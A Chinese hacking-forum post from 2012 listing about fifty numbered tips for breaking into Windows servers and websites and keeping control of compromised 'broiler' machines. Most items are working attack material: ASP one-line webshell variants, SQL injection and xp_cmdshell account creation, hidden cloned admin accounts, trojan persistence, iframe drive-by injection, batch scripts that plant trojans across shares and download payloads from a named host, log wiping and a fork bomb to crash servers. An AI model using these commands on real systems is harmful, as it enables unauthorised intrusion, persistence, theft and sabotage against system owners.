找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2158|回复: 0
打印 上一主题 下一主题

入侵渗透笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:13:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 I4 z6 q) s5 ?! C9 H2 Ecacls C:\windows\system32 /G hqw20:R
6 A' v  b+ ^3 H1 Z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, |6 U+ v' g- u4 ?3 n恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
% }& I  I  |' j& b0 f5 z. `) ]7 C& E+ e
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) b5 l; E  L* Y
0 c6 a& p. j& n4 P3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。- l/ Z( D. V; l; {1 y+ [

* I2 E8 |' n1 V$ n  I% l/ C4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号: Q, ~/ W9 ^9 a. z4 w% R" g
$ O- A/ s& a% {  M
5、利用INF文件来修改注册表+ \' {' T/ x- O9 k: B- E7 H( T
[Version]$ |6 i6 z: B' C" \0 p; G
Signature="$CHICAGO$"
8 l/ ~! g7 j3 c# f8 Y! a; h[Defaultinstall]  B. T2 f. k3 c7 t* [. K6 V
addREG=Ating
: K# @" d1 m' Q$ u9 a4 f[Ating]
3 y8 X2 z, c; S( _. _& xHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"1 p+ v* E) x! n5 F$ n+ g, V
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! E6 X* X" w" _rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
5 K( R. Z! z! r# R& L其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU% N/ h6 S  X' B4 P
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU- Q4 z8 C" v( u3 o' w3 k; K* m
HKEY_CURRENT_CONFIG 简写为 HKCC
/ T' f2 y+ _) X" ?. q) H. y0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
) G, N6 t! u6 \3 i; [5 n/ x% w: p"1"这里代表是写入或删除注册表键值中的具体数据
# ]  \$ F* Y) w% q# e0 N* |  u, V# R% ^  W' f
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,6 g! A: A0 T6 C5 t- m5 h0 D; }
多了一步就是在防火墙里添加个端口,然后导出其键值
9 B" T! s& U( P[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 F3 u- O, K) ]+ T2 _& e

! Y' {0 F" t" ^! {0 `7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽  \/ f" z! j& s9 q7 M
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" R# n  o* H( a+ b! }, S* O2 O, Y$ s

. F2 W5 ?# M- f0 y) t+ e8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。, q* R) B9 B  u5 o8 J1 x2 h- S

+ I9 a# E, y; d. `$ E9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,& o" f7 W# H7 `: e& c% D( L5 V
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。7 U$ `( N( q) ]( u$ B- @6 k
( v1 `- O3 ^- R# N$ M
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”& |1 \/ |" T5 T( M# o

! }2 n1 H' Q( @11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- h" E- V! i/ Y用法:xsniff –pass –hide –log pass.txt, x7 m& p4 H; ]$ [3 G

& p& `- e1 k  f* C1 g% T0 N12、google搜索的艺术3 U7 t* c. _0 g2 k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# p4 Q3 |1 B1 {( k7 A: `
或“字符串的语法错误”可以找到很多sql注入漏洞。
8 f9 Y# l$ S' p( k
9 K/ x  }9 x: }( J$ @0 K! y13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
7 c2 \* ^* n1 i3 d: ]) B. `; P8 n! L) h) Q' @- j5 }8 l0 X
14、cmd中输入 nc –vv –l –p 1987  {* T- M0 F& E5 D' m) n
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% S$ z- |) n7 c2 ^* H# q3 J
( O) F! H) m0 i- b4 i15、制作T++木马,先写个ating.hta文件,内容为
- @4 H+ m! [  o# A8 v6 J/ ?! B<script language="VBScript">2 S- C8 m1 `- y0 J, t4 H1 S+ i2 x
set wshshell=createobject ("wscript.shell" )
5 a. @7 n$ p2 y; y; pa=wshshell.run("你马的名称",1)
) b$ x' @2 K0 Q0 o3 ]; bwindow.close
! B. p. c9 R7 ?6 q  ~</script>
$ v3 @: `8 I+ ^2 g再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
6 ]0 \' E) d  V
! k7 S; ]6 |5 I16、搜索栏里输入
! t4 h; I! E0 ^" J1 {关键字%'and 1=1 and '%'='( w* e3 ~! d, [+ \
关键字%'and 1=2 and '%'='& `" ~: A' E, h8 f* n% Z
比较不同处 可以作为注入的特征字符- k8 i1 D* j5 a( Y+ f5 L, z% Y

: D1 Y( ~  A4 r3 u17、挂马代码<html>
$ L$ X' L) O8 a- K* }* H<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 r  f2 T3 d: G: x( f</html>0 q4 q) y7 T3 A
; u! J  H% i4 H4 T! ?( w
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- V4 ^! t) L1 e8 S* f" r/ xnet localgroup administrators还是可以看出Guest是管理员来。
" t2 D" U2 p, I5 O* m  q: k- c( I& I1 P# C: ]' P
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
8 c8 s. O1 B3 K6 F用法: 安装: instsrv.exe 服务名称 路径
7 @$ B9 H4 }6 ~0 n' R卸载: instsrv.exe 服务名称 REMOVE& E. j: y4 c. H6 a

; U/ K% x5 B& ^. H
$ Q( v- ^) U3 w- l0 ]! A- u$ m21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉2 W" k) m9 }5 V8 E: N5 V" l4 x
不能注入时要第一时间想到%5c暴库。
1 L% s) R4 j: |( K9 d& {/ g& I6 P& ~, B/ {4 I# Y0 k7 F( j
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
$ K/ r+ b% u  N% ~% h9 C6 m* _. l; M( l- f
23、缺少xp_cmdshell时" O! j6 U- W) d( z# j
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
  ]8 U# @  _8 d- t假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 \+ S& P0 R" i6 H) w8 n: {declare @o int
3 f" V, p, G: `' ~. v/ Bexec sp_oacreate 'wscript.shell',@o out
$ d2 M3 m" o' d  N, ~exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
( Y4 Z# Q9 u' h  `$ f/ ^
( p2 Y4 w4 ]5 l% Q/ \24.批量种植木马.bat
" ~) t6 G7 B% {& h- _0 Cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中7 b$ \+ P) A" M
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
- y7 _9 [! {/ Y2 a( G2 W扫描地址.txt里每个主机名一行 用\\开头
$ k5 f  R' A& ^4 [
& j1 D2 L" @4 C7 P; \. [25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。  U" z* M# k* l
/ [$ B, v) W% n7 m" a: K( s. `0 n% k
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
; ~, ]: H2 p- U( a6 @将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.9 I# }( |& H/ e4 m9 V  T) s
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& |$ V( D: r7 q' U7 B2 g
' y+ X  N" q! A' o$ q( {27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" ?* J0 t2 A$ s; S9 G' _8 t然后用#clear logg和#clear line vty *删除日志' ~# H- s. ?$ K& W* N

" L: b$ N/ C/ q2 m6 L3 K7 ~28、电脑坏了省去重新安装系统的方法
" i  Z$ S8 W* g3 m6 [- V9 ]纯dos下执行,
* f# s7 g/ R6 Q& bxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config) T; C* V0 b" G! m# O
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* b  m4 h, C" f) w6 n3 y9 h7 K; Z. ]+ R6 q3 E/ {
29、解决TCP/IP筛选 在注册表里有三处,分别是:
: O5 w* ^. ]7 u: l" G* P) @HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip; k# o8 ~) x( `
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
, y) h$ `! Q  U$ c' qHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
  D- d1 j: E# |分别用- j' x; t" H1 w
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 L, c7 T, h( h* m) a4 Kregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- y: ~8 @3 h, I: s! b1 V
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. w9 S1 z1 H" S& N; U3 u" \% d
命令来导出注册表项- c3 C2 y1 c0 U1 l( q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,, |' G' z* w3 C
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用% O1 k5 b4 J( t: ^" V1 e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& c  F- X( n/ Z) u2 l' I8 M2 _" E" g8 M# ?+ J  `
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U3 p1 D" U$ x1 k+ I/ z6 u4 C9 Y
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3$ M; Z$ i5 R7 ]
5 H5 F3 Q' V: Z
31、全手工打造开3389工具% p& F* v3 [, e% r
打开记事本,编辑内容如下:& W7 N  x9 P3 P+ I( h* V9 j: E) i
echo [Components] > c:\sql/ o) ?- L- J! @* ~
echo TSEnable = on >> c:\sql
0 z! o0 U/ ]" S- Lsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q9 g& i" m/ n* a% b- W* Z& J9 ~& s
编辑好后存为BAT文件,上传至肉鸡,执行
0 x: s( V& Q' P, b" h) L
% _$ o3 B; X- v32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
$ F0 x6 d5 z# P3 e9 m( e4 f$ a7 B6 T* f3 k+ H% P% b
33、让服务器重启% t& y' r: {3 f; Y: P( g0 O4 n
写个bat死循环:2 t' y- T2 C2 c3 \: t( K' v  ^' }
@echo off9 V1 G) j6 ^1 }7 H
:loop1
& p' {% S% g% v- Tcls* o" \; _6 r6 P1 {4 P* t. |1 t
start cmd.exe9 x4 j& D( M. E8 B  j1 V
goto loop1
; S6 n3 t% _8 O: w( [保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启% [: L9 x+ w! l

; e+ A& ?. a6 K# ^& A, |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,  h) a. J6 `5 i2 d" P8 K& J
@echo off
: ?( N: E% E! U5 N2 t3 {date /t >c:/3389.txt9 V6 S3 G( a  K
time /t >>c:/3389.txt+ t) P5 F9 t, U; V% g5 D2 B
attrib +s +h c:/3389.bat9 @. G4 G8 f) k
attrib +s +h c:/3389.txt" c9 k& B/ C, h7 |# p
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
5 p/ y3 x  [# x; q, E9 d1 k" I6 z并保存为3389.bat: y+ ~+ ]7 c, r. c
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
% [! T( ]* {6 D* R: h; M. {+ o
9 }* }( H5 d' h8 F35、有时候提不了权限的话,试试这个命令,在命令行里输入:
. P: e& |* Q8 B! J! U+ K8 }start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)* _; T# ?" V4 B' W
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。' @$ {1 S" `8 O/ A0 Q

* g: I, V" ]! @+ \0 A36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* Q& v! u' s' U& K" xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
$ v7 @; B; V9 D1 ~3 x3 _echo 你的FTP账号 >>c:\1.bat //输入账号) ]  M1 \+ H3 M
echo 你的FTP密码 >>c:\1.bat //输入密码1 g9 p# O0 Y; `  p8 C; J5 \( i
echo bin >>c:\1.bat //登入
) r/ P* J$ b( ~6 T) [6 m6 xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么, S* Q' t& |8 u
echo bye >>c:\1.bat //退出7 i  P9 N  b, W9 y
然后执行ftp -s:c:\1.bat即可3 j- ?( g5 g. d% p
( H4 b3 r# a- a" ]
37、修改注册表开3389两法& r4 U/ y* h* p& g# ~
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表6 l! O9 ?4 `, z/ d- L
echo Windows Registry Editor Version 5.00 >>3389.reg( q( v. e$ s* d" |( {& Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg# m2 S5 ?8 W+ N5 h3 N
echo "Enabled"="0" >>3389.reg
! G8 z9 O# y$ Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
9 D; U9 }: H  o2 ]+ k1 |  ONT\CurrentVersion\Winlogon] >>3389.reg
! ?0 ]. m' ?# D2 X  b( M- v' becho "ShutdownWithoutLogon"="0" >>3389.reg
7 v) b, z/ M' W' j( d8 Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]) I- c5 ?1 r" m3 |2 |
>>3389.reg" I! O' d% A% }# b6 [3 r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg7 T& e& }% n$ [$ R/ f6 ]5 @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 ?8 m* U( S" l
>>3389.reg: d1 H6 D/ ]1 v' |5 _8 d
echo "TSEnabled"=dword:00000001 >>3389.reg
* o) w8 c  N+ {& A( `1 o* wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
* j0 }& W: C. t! Q# aecho "Start"=dword:00000002 >>3389.reg+ x" o- o; x* v* p9 B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
; e9 m$ G3 B4 S6 P/ F>>3389.reg
/ h  C% `! v# O3 t- q* Decho "Start"=dword:00000002 >>3389.reg# H8 u/ q/ i( y3 m5 l: e
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg$ j% x0 a$ `5 N( ]
echo "Hotkey"="1" >>3389.reg3 x) G, @- n' l# C8 M+ m! }) V2 ^  x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
+ _* z& }8 q* m5 s; UServer\Wds\rdpwd\Tds\tcp] >>3389.reg+ v) w' I8 m1 `7 g0 F
echo "PortNumber"=dword:00000D3D >>3389.reg6 b7 O2 i7 f1 ~2 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* Q) D2 q. p& G0 T' F# C& u/ ]
Server\WinStations\RDP-Tcp] >>3389.reg
0 h0 M2 z" W. d6 h$ |echo "PortNumber"=dword:00000D3D >>3389.reg- D! o! u+ _$ l
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。" x4 [) {9 y' w* p
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)& `, @6 x1 U5 O2 O1 @
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 T' x6 b9 x( W9 ?, f
(2)winxp和win2003终端开启
# F$ j0 A# j' M7 E用以下ECHO代码写一个REG文件:, A$ s4 T4 H+ Y' X, J; W1 h% T
echo Windows Registry Editor Version 5.00>>3389.reg
: _) w# g1 v8 F* u' k; k$ Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( }) F7 Q4 @3 Z9 [- W% M+ F) ^" O& kServer]>>3389.reg
* v* p& e/ `- x& {( Oecho "fDenyTSConnections"=dword:00000000>>3389.reg
' P5 n, p$ Q) techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 s! K( `# l) ]7 N" w1 \
Server\Wds\rdpwd\Tds\tcp]>>3389.reg8 s7 P0 f) D. B; [8 `: K! H) ^
echo "PortNumber"=dword:00000d3d>>3389.reg
. x) m; Y5 G1 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- Y5 ?2 t, J: g" \+ o) \) H6 ^; ?7 XServer\WinStations\RDP-Tcp]>>3389.reg
% U$ ]6 y, p6 \5 r+ n; Oecho "PortNumber"=dword:00000d3d>>3389.reg3 ]! P1 g# |& T: X+ X, S/ k
然后regedit /s 3389.reg del 3389.reg/ H/ H7 i- f' \7 v
XP下不论开终端还是改终端端口都不需重启6 i/ h2 x4 {5 c, \0 x

, C) F$ v, v# v- z; ]* R# N38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
) W, O5 p2 I1 I, X1 }: m; U用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'0 E; o& x* m/ f$ ?$ @" v. `

: q. K# X% X0 o39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
# o/ ~+ b0 N0 g(1)数据库文件名应复杂并要有特殊字符+ {$ b; }6 N3 p3 O: h% M! U7 s
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
. I+ A; o2 T7 Y% q' q将conn.asp文档中的2 q' N& W  M1 B& F
DBPath = Server.MapPath("数据库.mdb")
3 F  w" s6 V* }, @0 L/ rconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
, K. F6 O$ n4 u* P% c0 h. ?% ]# K
5 \" G: T$ m, c9 _! w修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置& ]. W# H: i5 d5 e6 r) B# T" y  r7 p2 K
(3)不放在WEB目录里
/ ?' F0 d1 Z% o0 q8 y
) D3 \& W/ h& e" K* G; K40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
3 |- w& ^+ Q/ V$ S- v) D1 A5 x8 p0 ^7 q可以写两个bat文件
  i; ?+ R7 w8 M# ^" E7 |+ ^@echo off# g* {9 p! R, k/ U
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe' E- a5 h( f+ Q" L
@del c:\winnt\system32\query.exe
' Y0 q. ~) L6 Q$ q  e@del %SYSTEMROOT%\system32\dllcache\query.exe6 N/ e% O( U5 r
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 U9 y( J: i  j! v* f/ _4 m+ @- j8 o, N' ~- Y. c! N' K
@echo off
; K) k# x( {  G8 ]  T; y@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe6 M$ f4 U( p; D
@del c:\winnt\system32\tsadmin.exe
4 i4 D9 L+ N3 C) Q. B* c0 X8 \+ f( a@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) I" g  q( r6 C7 o0 d: Z
# d$ ]! L6 t; B, o$ s
41、映射对方盘符3 U' W  y) ^0 `+ V) f  n$ W# D+ o5 j
telnet到他的机器上,
$ H+ w1 H3 ?) E5 f) B" pnet share 查看有没有默认共享 如果没有,那么就接着运行; ~/ `( ^7 q: ^" W
net share c$=c:
) R$ n- K/ N* hnet share现在有c$3 \# ~% T! k2 D5 z1 m
在自己的机器上运行
. k* {$ O5 s, U/ U; Enet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
2 p8 h+ A5 B+ a/ ^6 U& q! }( m6 i( V6 x2 {( a
42、一些很有用的老知识  f" a, }/ F' o1 N$ Z
type c:\boot.ini ( 查看系统版本 )
2 `# E  L8 Z( @: Enet start (查看已经启动的服务)
# ~6 C7 w# p3 Xquery user ( 查看当前终端连接 ); h4 [1 V; U% Q" n9 [, g
net user ( 查看当前用户 )
' n% [1 r7 Q6 I: p2 {5 |0 Tnet user 用户 密码/add ( 建立账号 )
" S7 \7 x' }* d, ]net localgroup administrators 用户 /add (提升某用户为管理员)
2 M0 d) l" N3 k, B% P8 hipconfig -all ( 查看IP什么的 ): i$ @  L5 c7 E' B- w1 s8 J
netstat -an ( 查看当前网络状态 ). L( N6 [  V  c5 l
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码): U5 Z2 W) ?3 _4 [/ x
克隆时Administrator对应1F4
2 U2 r; O7 E6 Z! N; Xguest对应1F5
) R" M' r7 T- j1 D9 o/ Otsinternetuser对应3E8/ N5 Q. {# U$ q$ F; J

1 C" E. k1 V& n) U$ s4 U* ]- H& Q- H43、如果对方没开3389,但是装了Remote Administrator Service
+ W7 i; h% R, e5 ]  B+ N用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
0 I8 ~# f  B5 H" _解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
3 F" G  b+ S6 p3 @7 x- ~' B0 Q5 x先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"4 M7 n: r- ~' c7 x4 X9 O4 k

. l9 e$ r5 p/ J# j7 A3 u44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
, W( k* A5 B# u; r) P本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
- n- h  O3 \6 Z  ]$ R+ B: _7 \6 ]1 n& C! j5 q% }9 n
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
7 o5 c5 O" l$ _: y9 x/ \; fecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
( D/ s0 F) P6 N# V1 @^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =& A) q* i$ b* {' q
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =# l. t: Y" T  T: Q
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
" O) L$ ]8 q7 D& R3 ]- |' y: i" n- m" B(这是完整的一句话,其中没有换行符)
+ p5 B: d+ z' Q3 g/ h( n然后下载:8 x" ]- ^) y1 m. o6 A3 x
cscript down.vbs http://www.hack520.org/hack.exe hack.exe6 p4 E3 T; H; S, ]2 o

# N& |2 n6 ]' b6 H46、一句话木马成功依赖于两个条件:+ t) t6 F, e, _% s& p% e
1、服务端没有禁止adodb.Stream或FSO组件
1 q+ Q5 }1 J) F" e* S6 f% ?6 ^) H4 ~2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 A  p/ {* y- {3 F' Q# L* a% P1 L: K: V
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
( q$ v) p1 t2 o9 ];alter database utsz set RECOVERY FULL--
! W' B+ H+ \/ J! k;create table cmd (a image)--
1 F0 ^4 X1 f. q2 C. R1 e; v;backup log utsz to disk = 'D:\cmd' with init--  t7 [1 z5 l5 o( Q, M8 D: G
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--' {4 L4 b1 d+ p9 D) D, f, G
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--1 O( A5 C0 E  [7 l
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
: M, r$ r$ X, w
6 x. V+ g8 E7 Q9 M% F* j4 |; x48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% A4 J; e7 |& I: B" ?5 k  F6 ~! U) x3 [" h' [  x  o' k% X, f
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, b! c! u) K; v所有会话用 'all'。
" h, W' r$ X9 K! R-s sessionid 列出会话的信息。: B1 o! i+ J* D* E' F
-k sessionid 终止会话。
1 T! m8 f, h( H8 P7 {; w$ _-m sessionid 发送消息到会话。  `3 K: j0 b" l. s5 w" v+ R3 ^

( Y0 I% \0 J' E5 qconfig 配置 telnet 服务器参数。& |* I* Q/ o3 M! V" x- @+ k
1 L' M+ b; J6 Z! x/ X
common_options 为:6 o5 Q8 s1 R8 k' W) t) j; B; w
-u user 指定要使用其凭据的用户& H1 a3 ]6 f2 o
-p password 用户密码& Q' `2 H, V, {0 x. D
2 \! g! [0 F$ j2 J" Z) N; m' S1 W# F
config_options 为:
# D' N" \4 E7 [dom = domain 设定用户的默认域
( [# f# a) X3 \+ jctrlakeymap = yes|no 设定 ALT 键的映射
2 \1 V5 y0 Z% b6 `6 i3 otimeout = hh:mm:ss 设定空闲会话超时值, i" @0 z- u, D! j
timeoutactive = yes|no 启用空闲会话。/ k0 @8 {/ x( t
maxfail = attempts 设定断开前失败的登录企图数。
* H/ O% w9 l3 Y/ V1 H8 umaxconn = connections 设定最大连接数。% c9 b" K% J! r9 w: u! S1 e
port = number 设定 telnet 端口。
; e4 S  R& s7 jsec = [+/-]NTLM [+/-]passwd4 @: c2 w$ P7 E& p9 B* [1 A
设定身份验证机构
. l! [% ^5 ^& Y. \' \$ lfname = file 指定审计文件名。& c& k& U% j* c
fsize = size 指定审计文件的最大尺寸(MB)。2 v' j/ Z" T% P' m' z% N
mode = console|stream 指定操作模式。: W& k) v1 s- {! o: n( B) v1 d
auditlocation = eventlog|file|both3 V+ X' ~0 h0 g" ]; k* h
指定记录地点
. m1 ]' m8 c- S2 Saudit = [+/-]user [+/-]fail [+/-]admin
2 Q; n8 {1 J1 ^! w
+ D1 V$ W9 W7 z" j! O) |  |49、例如:在IE上访问:2 a) o& t' V0 j  Z) e( g8 I8 \
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
. ^& D- C& Z, U/ Z) D4 hhack.txt里面的代码是:% X  R; E. y$ ?0 H7 P4 D) Y( |
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
( x" @# E" g; S8 [. X9 }把这个hack.txt发到你空间就可以了!5 N! x# Y- V8 w& k5 R* ^, p
这个可以利用来做网马哦!
) ]% \$ c8 d7 Q' d( p; T+ F3 x- [+ m
50、autorun的病毒可以通过手动限制!
$ J: x) P+ t2 o, R" F1 O1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!9 c) K! a/ Q! y- S* V
2,打开盘符用右键打开!切忌双击盘符~, y1 k& i( M. v
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!1 K' L2 W* z: X) f+ e! G$ F

% _) d3 q; n& E3 ]1 Y, k; }51、log备份时的一句话木马:
; ~4 t* ^$ {' i# B1 d) K( `% X5 wa).<%%25Execute(request("go"))%%25>
3 V% D1 z% s. D/ l& Pb).<%Execute(request("go"))%>! i( E6 a5 \; T, L, p# W4 }2 z2 O
c).%><%execute request("go")%><%
$ j" F( q& n$ l0 s& s; xd).<script language=VBScript runat=server>execute request("sb")</Script>
; ]  ?3 T9 A7 _  y* [e).<%25Execute(request("l"))%25>
; U4 g" _# F7 ?+ wf).<%if request("cmd")<>"" then execute request("pass")%>9 m' B  q# b& c. ], F# t2 T
. J; x/ W0 H7 n# a2 m/ J
52、at "12:17" /interactive cmd0 R* `9 R1 a* Q" g5 L1 Q8 U1 o. m
